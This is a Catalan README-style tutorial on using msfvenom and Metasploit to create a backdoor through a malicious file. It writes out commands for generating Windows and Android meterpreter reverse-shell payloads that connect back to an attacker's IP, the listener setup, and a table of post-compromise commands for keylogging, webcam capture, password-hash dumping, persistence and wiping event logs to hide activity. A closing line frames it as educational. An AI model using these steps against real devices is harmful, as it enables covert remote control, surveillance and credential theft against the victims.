Hi 👋, I'm Gerijacki
En aquest projecte us explicaré com utilitzar msfvenom
i Metasploit
per crear una backdoor a qualsevol dispositiu a través d'un arxiu maliciós.
Msfvenom
és una eina potent de generació d'exploits del framework Metasploit
, utilitzada per crear càrregues útils de malware personalitzades. Permet generar diferents tipus d'arxius maliciosos, com arxius executables, documents ofuscats o scripts, amb l'objectiu d'explotar vulnerabilitats en sistemes informàtics per a fins de prova o atacs.
-
Primer de tot hem de tenir el framework
Metasploit
instal·lat. -
Ara crearem el payload utilitzant la següent estructura:
msfvenom [payload] (LHOST) (LPORT)[Output name and format]
Un exemple seria el següent:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.172.128 LPORT=4444 -o ejemplo.apk
Important: El tipus de payload que utilitzem determinarà en què del dispositiu afectarà el nostre binari. Podeu veure tots els payloads fent la comanda
msfvenom -l
-
Per configurar el payload bé hem de configurar els següents paràmetres de la següent manera:
LHOST
: Ip de la màquina atacant (Pública o privada, si és privada, la víctima ha d'estar a la mateixa xarxa que nosaltres)LPORT
: Port que utilitzarem per connectar-nos a la màquina. Recomano utilitzar un port que Windows no utilitzi per res més (en aquest cas el 4444)Payload
: Per crear una sessió remota (backdoor) utilitzaremmeterpreter
.Arquitectura
: En cas que vulguem infectar un ordinador, has d'indicar si vols un payload de 32 bits o 64 bits.Output
: Nom i format en els que exportaràs el "virus".Format
: Format en què exportaràs el payload.
-
Per fer un payload de Windows l'estructura és la següent:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ip màquina atacant) LPORT=4444 -a x86 -p windows -f exe > ejemplo.exe
-
Per fer un payload d'Android l'estructura és la següent:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(ip màquina atacant) LPORT=4444 -o ejemplo.apk
Metasploit
és una plataforma de proves d'intrusió i desenvolupament d'exploits, que ofereix una gamma d'eines i mòduls per a l'exploració, l'avaluació de vulnerabilitats i l'execució d'atacs en sistemes informàtics. És utilitzada per professionals de seguretat informàtica per detectar i corregir debilitats en els sistemes o per a fins maliciosos per part de cibercriminals.
Un cop tenim el payload creat, hem de configurar Metasploit
per posar la nostra màquina en "Escolta" i així poder-nos connectar.
- Entrem a
Metasploit
msfconsole
- Configurem quin payload/exploit volem utilitzar
Ara el payload: Important: Utilitzar a
use exploit/multi/handler
Metasploit
el mateix payload que hem configurat ambmsfvenom
set payload windows/meterpreter/reverse_tcp
- Ara hem de configurar
LHOST
iLPORT
set LHOST "IPmàquinaatacant"
set LPORT 4444
- Executem la comanda
options
per veure si tot està configurat i iniciemMetasploit
.Per iniciar:options
run
Ara només ens queda executar el malware a la màquina víctima i, com que tindrem la màquina atacant en escolta, es connectarà automàticament.
Meterpreter
és un payload altament flexible i potent del framework Metasploit
que s'utilitza per a l'explotació remota de sistemes. Proporciona un accés complet i control sobre la màquina compromesa, permetent executar comandes, obtenir informació i realitzar diverses accions malicioses. És
àmpliament utilitzat per professionals de la seguretat informàtica per a propòsits d'auditoria i proves d'intrusió.
Un cop tenim accés a través de Meterpreter
, algunes comandes interessants són les seguents:
Comanda | Descripció |
---|---|
sysinfo |
Obté informació detallada del sistema compromès. |
shell |
Crea una shell interactiva en el sistema compromès. |
ps |
Llista els processos en execució al sistema compromès. |
getuid |
Mostra el nom d'usuari actual al sistema compromès. |
upload |
Carrega un fitxer local al sistema compromès. |
download |
Descarrega un fitxer del sistema compromès al teu local. |
keyscan_start |
Inicia l'enregistrament de pulsacions de teclat. |
keyscan_dump |
Recupera les pulsacions de teclat enregistrades. |
migrate |
Canvia al procés especificat, escapant de l'execució actual. |
execute |
Executa una comanda en el sistema compromès. |
screenshot |
Captura una imatge de la pantalla del sistema compromès. |
webcam_snap |
Captura una imatge utilitzant la càmera web del sistema compromès. |
keyscan_stop |
Atura l'enregistrament de pulsacions de teclat. |
download_all |
Descarrega tots els fitxers del sistema compromès a la teva màquina. |
portfwd |
Reenvia els ports locals o remots per a l'accés a serveis remots. |
pivot_tcp |
Estableix una connexió TCP a través d'un salt (pivot) des de la víctima. |
run persistence |
Estableix persistència en el sistema compromès per a reinicis posteriors. |
clearev |
Elimina les entrades d'events de seguretat per a ocultar l'activitat. |
getsystem |
Intenta obtenir privilegis de sistema més alts en el sistema compromès. |
portscan |
Escaneja els ports oberts en el sistema compromès. |
hashdump |
Recupera les contrasenyes emmagatzemades en el sistema compromès. |
getpid |
Obté l'identificador del procés actual en el sistema compromès. |
enumdesktops |
Enumera els escriptoris actius en el sistema compromès. |
getprivs |
Mostra els privilegis actuals del procés en el sistema compromès. |
enum_users |
Enumera els usuaris i grups en el sistema compromès. |
enum_shares |
Enumera les carpetes compartides en el sistema compromès. |
execute_script |
Executa un script de llenguatge específic en el sistema compromès. |
local_exploit_suggest |
Suggereix exploits locals adequats basats en les vulnerabilitats detectades. |
timestomp |
Modifica els timestamps de fitxers per a ocultar l'activitat maliciosa. |
steal_token |
Roba el token d'identitat d'un procés en execució per a elevació de privilegis. |
El projecte ha estat desenvolupat amb l'objectiu de proporcionar als estudiants i als professionals de la seguretat informàtica una eina per comprendre les vulnerabilitats dels sistemes informàtics i les tècniques que poden utilitzar els hackers per accedir a informació confidencial. No ens fem responsables dels possibles usos inadequats que se li puguin donar a aquesta eina.
Copyright © 2021-present Gerijacki Org